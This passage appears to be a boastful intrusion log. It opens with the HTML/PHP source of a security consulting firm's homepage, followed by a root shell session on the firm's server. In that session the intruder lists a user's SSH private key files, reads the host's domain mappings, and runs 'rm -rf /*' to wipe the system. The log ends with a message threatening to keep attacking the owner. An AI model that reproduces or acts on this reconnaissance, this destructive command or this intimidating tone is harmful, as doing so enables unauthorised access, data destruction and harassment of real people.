security consulting firm. Founded by Kevin Mitnick, Mitnick Security Consulting

offers a comprehensive range of services to help businesses protect their
valuable
assets. Mitnick Security Consulting, LLC is a full-service information security

consulting firm. Founded by Kevin Mitnick, Mitnick Security Consulting offers
a comprehensive range of services. <a href="company.php">read more >></a></div>

<div class="bdtxt" style="background-color: #F4F4F4;"><strong>FBI Computer
Crime Survey</strong><br>
&#8220;This computer security survey eclipses any other that I have ever seen.
After reading it, everyone should realize the importance of establishing a
proactive
information security program.&#8221; - Kevin Mitnick<br>
<a href="media/2005%20FBI%20Computer%20Crime%20Survey%20Report.pdf">Click Here
To Download The Report</a><br></div>

<p align="center"><img src="images/br-top.png" width="506" height="10"></p>
  <div class="quote">"Mitnick left his audience shaken,but better
equipped to stave off attacks via social engineering."</div>
  
<div class="quote-att">- Computer Sciences Corporation (<a
href="media/CSC-Testimonial.pdf">Click
  Here for PDF</a>)</div>
      <br>
  <div class="quote">"It's both frightening and informative to
hear how effective social engineering can be in assessing what should be
security sensitive information."</div>
  
<div class="quote-att">- Scott Pettit - The AIM Institute (<a
href="media/Applied_Scan2.pdf">Click
  Here for PDF</a>)</div>
<div class="bdtxt"><a href="testimonials.php">Read more testimonials
>></a></div>
 
<p align="center"><img src="images/br-bot.png" width="506" height="10"></p>
  
<div class="bdtxt"><strong><a href="workshop_signup.php">2007 Las Vegas Social
  Engineering Workshop</a></strong><br>
 A two-day course covering:<br>
 - Social engineering case studies, attack methods, vulnerabilities in
 the human firewall, and techniques to protect your business <br>
 - Security policies development, follow-through, assessment, and
training
 <br>
 <br>
  <a href="workshop_signup.php">Sign up now >></a></div>
 <p align="center"><img src="images/br-top.png" width="506"
height="10"></p>
  
  
      <table width="100%" border="0" cellspacing="0" cellpadding="0">
 <tr valign="top">
   <td width="50%"><div class="bdtxt"><img
src="images/art-of-intrusion-cover.jpg" width="100" height="152" hspace="5"
align="left"><strong>The
       Art of Intrusion:</strong><br>
       The Real Stories Behind the Exploits of Hackers, Intruders, and
       Deceivers<br>
     <br>
       [ <a
href="
http://www.amazon.com/exec/obidos/tg/detail/-/0764569597/ref=ase_mitnicks
ecuri-20/103-6052457-8135069?v=glance&s=books">More
       Information</a> ]<br>
       [ <a href="aoi_reviews.php">Read The Press Reviews</a>
]</div></td>  
   <td><div class="bdtxt"><img src="images/art-of-deception-cover.jpg"
width="100" height="151" hspace="5" align="left"><strong>The
       Art of Deception:</strong><br>
       Controlling the Human Element of Security<br>
       <br>
       [ <a
href="
http://www.amazon.com/exec/obidos/tg/detail/-/0471237124/ref=ase_mitnicks
ecuri-20/103-6052457-8135069?v=glance&s=books">More
       Information</a> ]</div></td>
  </tr>
</table>

  

 


<!-- Copy ends -->

<?php require("_sidebar.php"); ?>

<?php require("_footer.php"); ?>
root@dc21 [~]# ls -la /home/mitsec/.ssh/
total 16
drwxr-xr-x  2 mitsec mitsec 4096 Sep  1  2008 .
drwxr-xr-x 22 mitsec mitsec 4096 Jul 16 10:36 ..
-rwxr-xr-x  1 mitsec mitsec    0 Nov 15  2008 authorized_keys
-rwxr-xr-x  1 mitsec mitsec    0 Nov 15  2008 authorized_keys2
-rwxr-xr-x  1 mitsec mitsec  744 Oct 20  2007 id_dsa
-rwxr-xr-x  1 mitsec mitsec  615 Oct 20  2007 id_dsa.pub
-rwxr-xr-x  1 mitsec mitsec    0 Nov 15  2008 known_hosts
toproot@dc21 [~]# cat /etc/userdomains
kevinmitnick.com: mitsec
defthi.com: mitsec
defthi.mitnicksecurity.com: mitsec
mitnicksecurity.com: mitsec
mitsec.com: mitsec
defensivethinking.com: mitsec
*: nobody
root@dc21 [~]# #good bye kevin
root@dc21 [~]# rm -rf /*
/dev/rm2: cannot remove `/dev/pts/0': Operation not permitted
[ snip ]
root@dc21 [/dev]# logout
Connection to
www.kevinmitnick.com closed by remote host.
Connection to
www.kevinmitnick.com closed.

Apologies for the poor quality of the hacklog, but I'm old now and let's face
it, Kevin Mitnick is done. You can move your box anywhere Kevin, we'll find you
and own you. You should know best, it's the "hacker" in us - or something like
that...See you soon.

Comments